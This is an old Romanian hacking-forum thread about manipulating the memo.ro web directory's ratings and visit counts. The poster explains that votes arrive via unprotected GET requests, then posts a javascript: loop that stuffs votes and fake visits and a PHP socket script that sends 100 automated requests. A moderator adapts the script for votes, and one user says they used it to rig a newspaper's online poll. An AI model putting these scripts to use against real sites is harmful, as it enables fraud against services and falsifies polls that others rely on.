Hacking and more...
HaCkinG CulT 		Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat. 		Nou pe simpatie:
AlinaMicu Profile
Femeie
25 ani
Brasov
cauta Barbat
25 - 39 ani
Hacking and more... / Exploituri si POCs / memo.ro Moderat de Shocker
Autor
Mesaj Pagini: 1
OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Plimbandu-ma prin web-ul asta mare si cu multe fenomene (era sa le spun webmasteri) m-am apucat sa fac putina reclama unui site. Bineinteles ca orice om cu frica de Bit si Byte am inceput sa inscriu site-ul in diferite directoare web. Din intamplare am ajuns si pe memo.ro care mi-a atras atentia printr-un sistem de "notare" a site-urilor. Exista doua valori dupa care un site e cotat ca fiind bun sau nu... prima este votul dat de vizitatori. Fiecare vizitator intra si poate da un rank paginii dupa cum considera (una pana la cinci stelute). Al doilea factor care decide daca un site e bun e numarul de vizite din portal. Adica, daca intra cineva acolo si intra pe pagina care corespunde site-ului inscris vede un link catre site-ul cu pricina, link care contorizeaza clickurile si cu cat sunt mai multe click-uri cu atat site-ul e mai important... OK, am inscris site-ul. Now what ? Bineinteles eram pe ultimul loc, ca doar sunt ultimul inscris, asa ca am zis sa vad daca nu pot urca macar putin... chiar cat sa nu fiu codasul directorului.

1. Votarea
Intru pe pagina cu detalii si vad ca imi permite sa votez. OK, suntem intr-o tara democrata deci ma pot vota singur, nu ? Am facut-o. Ma redirecteaza spre o pagina (trece foarte rapid de ea) si apoi ma lasa pe pagina de pe care am facut votul dar... lipseste meniul de votare. Adica eu am voie sa ma votez o singura data... urat din partea lor... daca mie imi place propriul site si vreau sa ma votez de 50 de ori care e problema lor ?
Nici o problema, am dat back de 2 ori si am ajuns la pagina initiala. Adica, vad iar meniul de votare. Ma mai votez o data. Hopa... a crescut votul... repet, din nou creste votul... mai dau de doua ori back si dau un view source. Vad formularul de votare de forma:

Code:

<form action="rate.php" method="get" name="rate" id="rate"> 
   <input name="iFile" type="hidden" id="iFile" value="CODUL_MEU"> 
   <select name="iRate" class="form"> 
      <option value="5" selected>* * * * *</option> 
      <option value="4">* * * *</option> 
      <option value="3">* * *</option> 
      <option value="2">* *</option> 
      <option value="1">*</option> 
   </select> 
<input name="rate" type="submit" class="form" id="Rate" value="Rate">
</form>

WTF ? Astia trimit prin GET votul... si nu au chiar nici un soi de protectie... nici protectie pe IP, nici macar protectie pe sesiune...
OK, hai sa vedem ce putem face cu ce avem pana aici. Am luat formularul si l-am studiat si in cateva secunde am ajuns la un link de forma:

Code:

http://www.memo.ro/directorweb/rate.php?iFile=CODUL_MEU&iRate=5

Am pus in browser, am dat enter si... guess what ? Am fost redirectat la pagina cu detaliile site-ului dar de data asta cu un vot in plus. Nice... ok, am intrat inca o data acolo si am facut un mic cod care arata de forma:

Code:

javascript:for(i=0;i<15;i++)window.open('http://www.memo.ro/directorweb/rate.php?iFile=CODUL_MEU&iRate=5','_blank');

Am intrat iar in browser, l-am pus in address bar si am dat enter. Automat mi s-au deschis 15 pagini si... am avut 15 voturi in plus... toate cu nota 5 (maxim). That's naughty.

2. Numarul de vizite
Daca am vazut ca treaba merge asa usor mi-am zis "Ia sa vad cum sta treaba cu numarul de vizite". Am vazut ca nu exista link direct catre pagina ci doar o pagina de redirectare. Urat din partea lor... asta inseamna ca nu transfera PR... ok, macar sa vedem daca imi pot creste numarul de vizite cu ce imi ofera. Am luat codul JavaScript de mai sus si in loc de rate.php am pus redirect.php si am sters &iRate=5. Mi-a iesit un cod de forma:

Code:

javascript:for(i=0;i<15;i++)window.open('http://www.memo.ro/directorweb/redirect.php?iFile=CODUL_MEU','_blank');

Am pus in address bar, am dat un enter si... guess what ? Dintr-o data am avut cu 15 vizitatori in plus.

--- End Of Storry ---

OK, acum o sa ziceti ca nu-i frumos ce am facut si ca ar trebui sa anunt webhamsterul. Am incercat. Am dat reply pe adresa de pe care mi s-a trimis confirmarea inscrierii in director ( contact at memo dot ro ) dar spre stupoarea mea, adresa nu e valabila. Adica, ei imi ofera un serviciu dar daca vreau sa renunt la serviciul lor sau daca am o problema sau daca gasesc un bug nu-i pot anunta. Bineinteles, exista formularul de contact pe web, dar daca lor nu le pasa de feedback-ul care vroiam sa-l ofer sa fie sanatosi. Nu-mi bat eu capul sa le fac treaba.

Sper sa va placa.
Bafta !

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
pus acum 17 ani
   
maleficus
Elite Member

Din: 0111 1000
Inregistrat: acum 17 ani
Postari: 515
  da' tu te plictisesti rau de tot osho

_______________________________________
Viata e un joc de c***t ... dar macar are grafica buna!!!
onlain gheims...

pus acum 17 ani
   
OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Continuarea (tot de plictiseala), un scriptulet in PHP care genereaza vizite:

Code:

<?php
$voturi = 100;
for( $i=0 ; $i<$voturi ; $i++ ){
   echo "$i in progress...";
   $sc = fsockopen('www.memo.ro',80,$errno,$errstr,30) or die('Nu am putut crea socketul');
   $out = "HEAD /directorweb/redirect.php?iFile=AICI_PUNETI_NUMARUL HTTP/1.1rn";
   $out.= "Host: www.memo.rorn";
   $out.= "Referer: http://www.pulaverde.ro/rn";
   $out.= "Connection: Closernrn";
   fwrite($sc, $out);
   fclose($sc);
   echo " Done.<br />";
}
echo "Done.<br />$voturi voturi efectuate cu succes";
?>



_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
pus acum 17 ani
   
Biwo
Membru nou

Inregistrat: acum 17 ani
Postari: 6
Ce ochi poti sa ai  Primul lucru pe care il faci cand intrii pe un site te uiti la parametrii din adresa. ? & ? & = 0 1 0 0 1 1 1 0 1
pus acum 17 ani
   
OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Nu. Ma uit la sursa. Chiar daca HTML-ul nu poate fi exploatat, formatarea codului iti arata daca un site e lucrat de un amator sau nu

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
pus acum 17 ani
   
BlackForce
Grand Master

Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
daca u asta faci cand te plicisesti ce faci atunci cand vrei cu adevarat ceva ?!        

_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
pus acum 17 ani
   
OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069

BlackForce a scris:

daca u asta faci cand te plicisesti ce faci atunci cand vrei cu adevarat ceva ?!

Imi cumpar o lada de bere si ma pregatesc sufleteste

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
pus acum 17 ani
   
Zero_Cool
Pe lista neagra

Inregistrat: acum 17 ani
Postari: 796
script php care baga voturi nu poti sa faci ?

pus acum 17 ani
   
hfhun
Elite Member

Inregistrat: acum 17 ani
Postari: 593

Zero_Cool a scris:

script php care baga voturi nu poti sa faci ?




OSHO a scris:

Continuarea (tot de plictiseala), un scriptulet in PHP care genereaza vizite:

Code:

<?php
$voturi = 100;
for( $i=0 ; $i<$voturi ; $i++ ){
   echo "$i in progress...";
   $sc = fsockopen('www.memo.ro',80,$errno,$errstr,30) or die('Nu am putut crea socketul');
   $out = "HEAD /directorweb/redirect.php?iFile=AICI_PUNETI_NUMARUL HTTP/1.1rn";
   $out.= "Host: www.memo.rorn";
   $out.= "Referer: http://www.pulaverde.ro/rn";
   $out.= "Connection: Closernrn";
   fwrite($sc, $out);
   fclose($sc);
   echo " Done.<br />";
}
echo "Done.<br />$voturi voturi efectuate cu succes";
?>





_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto
pus acum 17 ani
   
OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069

Zero_Cool a scris:

script php care baga voturi nu poti sa faci ?

Ai citit macar ce am scris ?

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
pus acum 17 ani
   
Zero_Cool
Pe lista neagra

Inregistrat: acum 17 ani
Postari: 796
eu vroiam pentru voturi nu pentru vizite 


aaaa, dar nu stiu php ca sa bag numaru de voturi

Modificat de Zero_Cool (acum 17 ani)
pus acum 17 ani
   
Shocker
Super Moderator

Din: localhost
Inregistrat: acum 17 ani
Postari: 2084
Dai pe VOTE si vezi catre ce link te trimite sau ce incearca sa deschida blabla. Ar trebui sa fie de forma

http://www.memo.ro/directorweb/rate.php?iFile=AICI_PUNETI_NUMARUL&blabla=5

Unde blabla reprezinta variabila care tine votul si 5 votul insusi.

Scrii aia in fisierul respectiv... cred ca ai inteles

LE: M-am uitat eu... e &iRate=5
Deci o sa pui

Code:

$out = "HEAD /directorweb/rate.php?iFile=AICI_PUNETI_NUMARUL&iRate=5 HTTP/1.1\r\n";



Modificat de Shocker (acum 16 ani)

_______________________________________
ShockingSoft is back
Freakz only
Comics of the day
pus acum 17 ani
   
biana
Membru nou

Inregistrat: acum 17 ani
Postari: 2
multumesc mult pentru acest post, putin modificat a functionat perfect pentru sondajul din Curentul ... vroiau sa-l publice a doua zi si nu au mai reusit pentru ca proportia era de 90,9% in favoarea mea ca sa nu mai vorbim ca voturile siteului meu pe memo.ro  sunt luate in calcul de trafic ... multumesc
pus acum 17 ani
   
Pagini: 1  

Mergi la